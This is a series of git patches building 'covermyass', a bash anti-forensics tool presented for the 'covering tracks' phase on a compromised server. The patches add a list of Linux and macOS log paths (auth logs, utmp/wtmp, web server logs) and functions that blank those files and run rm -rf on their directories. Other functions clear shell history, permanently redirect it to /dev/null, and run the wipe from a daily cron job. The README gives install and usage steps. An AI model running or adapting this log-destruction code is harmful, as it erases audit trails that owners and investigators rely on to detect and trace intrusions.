From 0e04932479135b2c76673ada1043e27873c3404f Mon Sep 17 00:00:00 2001 From: Raphael Date: Fri, 18 Jan 2019 17:17:00 +0100 Subject: [PATCH 01/12] Update .travis.yml --- .travis.yml | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/.travis.yml b/.travis.yml index 0ec2e44..e75d9ad 100644 --- a/.travis.yml +++ b/.travis.yml @@ -1,3 +1,6 @@ os: linux -script: echo "test" && exit 1 +script: +- chmod +x *.sh +- ./install.sh +- shellcheck covermyass From 3ceb15f619371652b08697a4c8698f02ab1f36f5 Mon Sep 17 00:00:00 2001 From: Raphael Date: Fri, 18 Jan 2019 17:20:23 +0100 Subject: [PATCH 02/12] Use sudo --- .travis.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.travis.yml b/.travis.yml index e75d9ad..7bb375e 100644 --- a/.travis.yml +++ b/.travis.yml @@ -2,5 +2,5 @@ os: linux script: - chmod +x *.sh -- ./install.sh +- sudo ./install.sh - shellcheck covermyass From 3d253c5adfd877972e115ffcd727afe5f6aa7443 Mon Sep 17 00:00:00 2001 From: Raphael Date: Sun, 17 Mar 2019 15:27:42 +0100 Subject: [PATCH 03/12] Typo --- .travis.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.travis.yml b/.travis.yml index 7bb375e..0c1e357 100644 --- a/.travis.yml +++ b/.travis.yml @@ -3,4 +3,4 @@ os: linux script: - chmod +x *.sh - sudo ./install.sh -- shellcheck covermyass +- shellcheck covermyass.sh From fae01e0a64aba828e9e421c62d7154bbb451fa61 Mon Sep 17 00:00:00 2001 From: Raphael Date: Sun, 17 Mar 2019 15:32:54 +0100 Subject: [PATCH 04/12] Build status --- README.md | 14 +++++++++----- 1 file changed, 9 insertions(+), 5 deletions(-) diff --git a/README.md b/README.md index db900a2..6b8deb0 100644 --- a/README.md +++ b/README.md @@ -1,8 +1,10 @@ -# Cover my ass +# Covermyass + +![Build status](https://img.shields.io/travis/sundowndev/covermyass/master.svg?style=flat-square) CLI tool to cover your tracks on UNIX systems. Designed for pen testing "Covering Tracks" phase, before exiting the infected server. Or, even better, permanently disable bash & auth history. -**This tool supports zsh shell.** +**This tool supports zsh & bash shell.** ## Installation @@ -45,15 +47,17 @@ Select an option : > ``` -Clear auth & history instantly +*NOTE: don't forget to exit the terminal session as the history is cached.* + +Clear auth & history instantly : ``` -covermyass now +sudo covermyass now ``` ### Using cron job -Clear auth & bash history every day at 5am +Clear bash history every day at 5am : ``` 0 5 * * * covermyass now >/dev/null 2>&1 From 95b4577dc558c6a5ef004147933d93dd2959f02d Mon Sep 17 00:00:00 2001 From: Raphael Date: Sun, 17 Mar 2019 15:50:20 +0100 Subject: [PATCH 05/12] Documentation --- README.md | 19 ++++++++++++++++++- 1 file changed, 18 insertions(+), 1 deletion(-) diff --git a/README.md b/README.md index 6b8deb0..4994899 100644 --- a/README.md +++ b/README.md @@ -1,9 +1,26 @@ # Covermyass ![Build status](https://img.shields.io/travis/sundowndev/covermyass/master.svg?style=flat-square) +![Tag](https://img.shields.io/github/tag/SundownDEV/covermyass.svg?style=flat-square) CLI tool to cover your tracks on UNIX systems. Designed for pen testing "Covering Tracks" phase, before exiting the infected server. Or, even better, permanently disable bash & auth history. +This tool allows you to clear log files such as : + +- `/var/log/messages` : General message and system related stuff +- `/var/log/auth.log` : Authenication logs +- `/var/log/kern.log` : Kernel logs +- `/var/log/cron.log` : Crond logs (cron job) +- `/var/log/maillog` : Mail server logs +- `/var/log/qmail/` : Qmail log directory (more files inside this directory) +- `/var/log/httpd/` : Apache access and error logs directory +- `/var/log/lighttpd/` : Lighttpd access and error logs directory +- `/var/log/boot.log` : System boot log +- `/var/log/mysqld.log` : MySQL database server log file +- `/var/log/secure` or `/var/log/auth.log` : Authentication log +- `/var/log/utmp` or `/var/log/wtmp` : Login records file +- `/var/log/yum.log` : Yum command log file. + **This tool supports zsh & bash shell.** ## Installation @@ -47,7 +64,7 @@ Select an option : > ``` -*NOTE: don't forget to exit the terminal session as the history is cached.* +*NOTE: don't forget to exit the terminal session since the bash history is cached.* Clear auth & history instantly : From 6ae975829554755ed24f86fa5a81085a8048151f Mon Sep 17 00:00:00 2001 From: Raphael Date: Sun, 17 Mar 2019 15:55:02 +0100 Subject: [PATCH 06/12] Documentation --- README.md | 14 +++++++++++++- 1 file changed, 13 insertions(+), 1 deletion(-) diff --git a/README.md b/README.md index 4994899..68cb58a 100644 --- a/README.md +++ b/README.md @@ -3,10 +3,12 @@ ![Build status](https://img.shields.io/travis/sundowndev/covermyass/master.svg?style=flat-square) ![Tag](https://img.shields.io/github/tag/SundownDEV/covermyass.svg?style=flat-square) -CLI tool to cover your tracks on UNIX systems. Designed for pen testing "Covering Tracks" phase, before exiting the infected server. Or, even better, permanently disable bash & auth history. +CLI tool to cover your tracks on UNIX systems. Designed for pen testing "Covering Tracks" phase, before exiting the infected server. Or, even better, permanently disable system logs for post-exploitation. This tool allows you to clear log files such as : +**Linux** + - `/var/log/messages` : General message and system related stuff - `/var/log/auth.log` : Authenication logs - `/var/log/kern.log` : Kernel logs @@ -21,6 +23,16 @@ This tool allows you to clear log files such as : - `/var/log/utmp` or `/var/log/wtmp` : Login records file - `/var/log/yum.log` : Yum command log file. +**macOS** + +- `/var/log` : System Log Folder +- `/var/log/system.log` : System Log +- `/var/log/DiagnosticMessages` : Mac Analytics Data +- `/Library/Logs` : System Application Logs +- `/Library/Logs/DiagnosticReports` : System Reports +- `~/Library/Logs` : User Application Logs (in other words, /Users/NAME/Library/Logs) +- `~/Library/Logs/DiagnosticReports` : User Reports (in other words, /Users/NAME/Library/Logs/DiagnosticReports) + **This tool supports zsh & bash shell.** ## Installation From ff85e664922b128a5826a72bf6b6ecc6a547ead6 Mon Sep 17 00:00:00 2001 From: Raphael Date: Sun, 17 Mar 2019 16:24:24 +0100 Subject: [PATCH 07/12] Documentation --- README.md | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/README.md b/README.md index 68cb58a..7b87eb3 100644 --- a/README.md +++ b/README.md @@ -22,6 +22,7 @@ This tool allows you to clear log files such as : - `/var/log/secure` or `/var/log/auth.log` : Authentication log - `/var/log/utmp` or `/var/log/wtmp` : Login records file - `/var/log/yum.log` : Yum command log file. +- `~/.bash_history` and `~/.zsh_history` : User commands history **macOS** @@ -51,7 +52,7 @@ curl -sSL https://raw.githubusercontent.com/sundowndev/covermyass/master/covermy chmod +x ./covermyass ``` -Keep in mind that without sudo privileges, you'll be unable to clean auth logs. +Keep in mind that without sudo privileges, you *might* be unable to system level log files (`/var/log`). ## Usage @@ -68,7 +69,7 @@ Welcome to Cover my ass tool ! Select an option : -1) Clear auth & bash history for user root +1) Clear logs for user root 2) Permenently disable auth & bash history 3) Restore settings to default 99) Exit tool @@ -78,7 +79,7 @@ Select an option : *NOTE: don't forget to exit the terminal session since the bash history is cached.* -Clear auth & history instantly : +Clear logs instantly (requires *sudo* to be efficient) : ``` sudo covermyass now From 208e6151744e6d87c3c1480c4e8a0871bc454c29 Mon Sep 17 00:00:00 2001 From: sundowndev Date: Sun, 17 Mar 2019 16:45:53 +0100 Subject: [PATCH 08/12] Clear log function --- covermyass.sh | 51 +++++++++++++++++++++++++++++++++++++++++---------- 1 file changed, 41 insertions(+), 10 deletions(-) diff --git a/covermyass.sh b/covermyass.sh index 67bdef0..4aa4c07 100755 --- a/covermyass.sh +++ b/covermyass.sh @@ -1,5 +1,24 @@ #!/usr/bin/env bash +LOGS_FILES=( + /var/log/messages + /var/log/auth.log + /var/log/kern.log + /var/log/cron.log + /var/log/maillog + /var/log/boot.log + /var/log/mysqld.log + /var/log/secure + /var/log/utmp + /var/log/yum.log + /var/log/system.log + /var/log/DiagnosticMessages + /Library/Logs + ~/Library/Logs + /Library/Logs/DiagnosticReports + ~/Library/Logs/DiagnosticReports +) + function isRoot () { if [ "$EUID" -ne 0 ]; then return 1 @@ -87,13 +106,25 @@ function enableHistory () { echo "Permenently enabled bash log." } -function clearAuth () { - if [ -w /var/log/auth.log ]; then - echo "" > /var/log/auth.log - echo "[+] /var/log/auth.log cleaned." - else - echo "[!] /var/log/auth.log is not writable! Retry using sudo." - fi +function clearLogs () { + for i in ${LOGS_FILES[@]} + do + if [ -f $i ]; then + if [ -w $i ]; then + echo "" > $i + echo "[+] $i cleaned." + else + echo "[!] $i is not writable! Retry using sudo." + fi + elif [ -d $i ]; then + if [ -w $i ]; then + rm -rf $i/* + echo "[+] $i cleaned." + else + echo "[!] $i is not writable! Retry using sudo." + fi + fi + done } function clearHistory () { @@ -117,11 +148,11 @@ function exitTool () { exit 1 } -clear # Clear output +# clear # Clear output # "now" option if [ -n "$1" ] && [ "$1" == 'now' ]; then - clearAuth + clearLogs clearHistory exitTool fi @@ -130,7 +161,7 @@ menu if [[ $option == 1 ]]; then # Clear current history - clearAuth + clearLogs clearHistory elif [[ $option == 2 ]]; then # Permenently disable auth & bash log From be7af5f2ce3b095e7e00858960f414ca572c7b30 Mon Sep 17 00:00:00 2001 From: sundowndev Date: Sun, 17 Mar 2019 16:58:37 +0100 Subject: [PATCH 09/12] Logs files comments --- covermyass.sh | 42 +++++++++++++++++++++++------------------- 1 file changed, 23 insertions(+), 19 deletions(-) diff --git a/covermyass.sh b/covermyass.sh index 4aa4c07..5601448 100755 --- a/covermyass.sh +++ b/covermyass.sh @@ -1,22 +1,26 @@ #!/usr/bin/env bash LOGS_FILES=( - /var/log/messages - /var/log/auth.log - /var/log/kern.log - /var/log/cron.log - /var/log/maillog - /var/log/boot.log - /var/log/mysqld.log - /var/log/secure - /var/log/utmp - /var/log/yum.log - /var/log/system.log - /var/log/DiagnosticMessages - /Library/Logs - ~/Library/Logs - /Library/Logs/DiagnosticReports - ~/Library/Logs/DiagnosticReports + /var/log/messages # General message and system related stuff + /var/log/auth.log # Authenication logs + /var/log/kern.log # Kernel logs + /var/log/cron.log # Crond logs + /var/log/maillog # Mail server logs + /var/log/boot.log # System boot log + /var/log/mysqld.log # MySQL database server log file + /var/log/qmail # Qmail log directory + /var/log/httpd # Apache access and error logs directory + /var/log/lighttpd # Lighttpd access and error logs directory + /var/log/secure # Authentication log + /var/log/utmp # Login records file + /var/log/wtmp # Login records file + /var/log/yum.log # Yum command log file + /var/log/system.log # System Log + /var/log/DiagnosticMessages # Mac Analytics Data + /Library/Logs # System Application Logs + /Library/Logs/DiagnosticReports # System Reports + ~/Library/Logs # User Application Logs + ~/Library/Logs/DiagnosticReports # User Reports ) function isRoot () { @@ -56,7 +60,7 @@ function disableHistory () { ln /dev/null ~/.bash_history -sf echo "[+] Permanently sending bash_history to /dev/null" - if [ -a ~/.zsh_history ]; then + if [ -f ~/.zsh_history ]; then ln /dev/null ~/.zsh_history -sf echo "[+] Permanently sending zsh_history to /dev/null" fi @@ -128,7 +132,7 @@ function clearLogs () { } function clearHistory () { - if [ -a ~/.zsh_history ]; then + if [ -f ~/.zsh_history ]; then echo "" > ~/.zsh_history echo "[+] ~/.zsh_history cleaned." fi @@ -148,7 +152,7 @@ function exitTool () { exit 1 } -# clear # Clear output +clear # Clear output # "now" option if [ -n "$1" ] && [ "$1" == 'now' ]; then From b167145b36fd6366563be04b10c8369945aef7ac Mon Sep 17 00:00:00 2001 From: Raphael Date: Sun, 17 Mar 2019 16:59:13 +0100 Subject: [PATCH 10/12] Documentation --- README.md | 53 +++++++++++++++++++++++++---------------------------- 1 file changed, 25 insertions(+), 28 deletions(-) diff --git a/README.md b/README.md index 7b87eb3..1e542df 100644 --- a/README.md +++ b/README.md @@ -7,34 +7,31 @@ CLI tool to cover your tracks on UNIX systems. Designed for pen testing "Coverin This tool allows you to clear log files such as : -**Linux** - -- `/var/log/messages` : General message and system related stuff -- `/var/log/auth.log` : Authenication logs -- `/var/log/kern.log` : Kernel logs -- `/var/log/cron.log` : Crond logs (cron job) -- `/var/log/maillog` : Mail server logs -- `/var/log/qmail/` : Qmail log directory (more files inside this directory) -- `/var/log/httpd/` : Apache access and error logs directory -- `/var/log/lighttpd/` : Lighttpd access and error logs directory -- `/var/log/boot.log` : System boot log -- `/var/log/mysqld.log` : MySQL database server log file -- `/var/log/secure` or `/var/log/auth.log` : Authentication log -- `/var/log/utmp` or `/var/log/wtmp` : Login records file -- `/var/log/yum.log` : Yum command log file. -- `~/.bash_history` and `~/.zsh_history` : User commands history - -**macOS** - -- `/var/log` : System Log Folder -- `/var/log/system.log` : System Log -- `/var/log/DiagnosticMessages` : Mac Analytics Data -- `/Library/Logs` : System Application Logs -- `/Library/Logs/DiagnosticReports` : System Reports -- `~/Library/Logs` : User Application Logs (in other words, /Users/NAME/Library/Logs) -- `~/Library/Logs/DiagnosticReports` : User Reports (in other words, /Users/NAME/Library/Logs/DiagnosticReports) - -**This tool supports zsh & bash shell.** +```bash +# Linux +/var/log/messages # General message and system related stuff +/var/log/auth.log # Authenication logs +/var/log/kern.log # Kernel logs +/var/log/cron.log # Crond logs +/var/log/maillog # Mail server logs +/var/log/boot.log # System boot log +/var/log/mysqld.log # MySQL database server log file +/var/log/qmail # Qmail log directory +/var/log/httpd # Apache access and error logs directory +/var/log/lighttpd # Lighttpd access and error logs directory +/var/log/secure # Authentication log +/var/log/utmp # Login records file +/var/log/wtmp # Login records file +/var/log/yum.log # Yum command log file + +# macOS +/var/log/system.log # System Log +/var/log/DiagnosticMessages # Mac Analytics Data +/Library/Logs # System Application Logs +/Library/Logs/DiagnosticReports # System Reports +~/Library/Logs # User Application Logs +~/Library/Logs/DiagnosticReports # User Reports +``` ## Installation From 7c74fddab28586e730e0c2d4fd7499fb15eda150 Mon Sep 17 00:00:00 2001 From: sundowndev Date: Sun, 17 Mar 2019 17:01:07 +0100 Subject: [PATCH 11/12] Menu --- covermyass.sh | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/covermyass.sh b/covermyass.sh index 5601448..15d1c69 100755 --- a/covermyass.sh +++ b/covermyass.sh @@ -36,7 +36,7 @@ function menu () { echo echo "Select an option :" echo - echo "1) Clear auth & bash history for user $USER" + echo "1) Clear logs for user $USER" echo "2) Permenently disable auth & bash history" echo "3) Restore settings to default" echo "99) Exit tool" @@ -164,7 +164,7 @@ fi menu if [[ $option == 1 ]]; then - # Clear current history + # Clear logs & current history clearLogs clearHistory elif [[ $option == 2 ]]; then From 99a9034c5cdf3b54ff36913d74a65202aa18b47a Mon Sep 17 00:00:00 2001 From: sundowndev Date: Sun, 17 Mar 2019 17:09:29 +0100 Subject: [PATCH 12/12] Fix shellcheck errors --- covermyass.sh | 14 +++++++------- 1 file changed, 7 insertions(+), 7 deletions(-) diff --git a/covermyass.sh b/covermyass.sh index 15d1c69..35506fc 100755 --- a/covermyass.sh +++ b/covermyass.sh @@ -111,18 +111,18 @@ function enableHistory () { } function clearLogs () { - for i in ${LOGS_FILES[@]} + for i in "${LOGS_FILES[@]}" do - if [ -f $i ]; then - if [ -w $i ]; then - echo "" > $i + if [ -f "$i" ]; then + if [ -w "$i" ]; then + echo "" > "$i" echo "[+] $i cleaned." else echo "[!] $i is not writable! Retry using sudo." fi - elif [ -d $i ]; then - if [ -w $i ]; then - rm -rf $i/* + elif [ -d "$i" ]; then + if [ -w "$i" ]; then + rm -rf "${i:?}"/* echo "[+] $i cleaned." else echo "[!] $i is not writable! Retry using sudo."